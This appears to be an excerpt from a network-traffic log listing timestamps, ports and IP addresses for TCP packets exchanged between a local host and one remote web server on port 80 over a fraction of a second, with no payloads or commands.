Sep 25, 2024 16:03:23.251935005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251949072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.251954079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251965046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251966000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.251990080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252008915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252010107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252019882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252032042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252043962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252052069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252062082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252068996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252077103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252089024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252099991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252100945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252113104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252125978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252136946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252140045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252149105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252160072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252162933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252171040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252182007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252187014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252193928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252206087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252218962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252222061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252235889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252248049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252253056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252258062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252269030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252280951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252285004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252290964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252301931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252305984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252317905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252338886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252341032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252353907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252357006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252365112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252377033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252387047 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252388954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252402067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252413034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252415895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252432108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252444029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252449036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252455950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252468109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252475023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252479076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252491951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252504110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252533913 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252594948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252615929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252626896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252635002 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252636909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252650023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252660990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252661943 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252672911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252682924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252691984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252693892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252705097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252715111 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252716064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252732038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252732038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252744913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252768040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252779961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252784967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252784967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252823114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.252985954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.252998114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253009081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253020048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253031015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253037930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253042936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253055096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253061056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253077030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253087044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253087044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253098965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253109932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253110886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253122091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253133059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253142118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253144026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253156900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253166914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253170013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253181934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253192902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253192902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253205061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253205061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253215075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253235102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253237009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253245115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253257036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253257036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253268003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253279924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253281116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253290892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253303051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253314018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253314018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253314018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253326893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253338099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253379107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253458977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253469944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253484011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253520966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253524065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253531933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253542900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253562927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253565073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253583908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253679991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253691912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253704071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253715992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253722906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253726006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253737926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253746986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253750086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253761053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253772020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253777981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253783941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.253803968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.253820896 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.260344028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340111017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340128899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340138912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340178967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340181112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340189934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340223074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340234041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340241909 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340246916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340269089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340274096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340281963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340286016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340292931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340305090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340315104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340327978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340332985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340338945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340351105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340353012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340375900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340384960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340464115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340476036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340487003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340500116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340509892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340512037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340523958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340529919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340536118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340548992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340557098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340576887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340603113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340614080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340626001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340656996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340694904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340718985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340727091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340730906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340744019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340755939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340763092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340785027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340807915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340823889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340835094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340845108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340857029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.340876102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.340903044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341016054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341031075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341042995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341053009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341061115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341065884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341077089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341088057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341097116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341108084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341114998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341120005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341130972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341131926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341151953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341159105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341162920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341173887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341187000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341190100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341211081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341223001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341228962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341239929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341244936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341247082 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341253996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341263056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341268063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341273069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341278076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341283083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341288090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341294050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341305017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341305017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341311932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341322899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341336966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341336966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341350079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341362000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341378927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341449976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341461897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341473103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341483116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341496944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341504097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341531038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341552973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341563940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341573954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341583014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341587067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341598988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341609001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341610909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341623068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341634035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341645002 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341648102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341658115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341661930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341670036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341687918 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341707945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341711044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341717958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341727972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341741085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341746092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341770887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341811895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341824055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341842890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341855049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341866016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341871023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341877937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341890097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341907024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341938972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341949940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341959953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341968060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.341972113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.341993093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342103004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342113018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342124939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342130899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342145920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342156887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342156887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342168093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342179060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342185020 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342190027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342200994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342209101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342214108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342227936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342233896 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342247009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342257023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342257977 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342267990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342287064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342291117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.342295885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.342314959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.352221966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.428644896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428673029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428710938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428739071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428757906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428772926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.428776026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428772926 CEST	49715	80	192.168.2.6	172.94.3.25
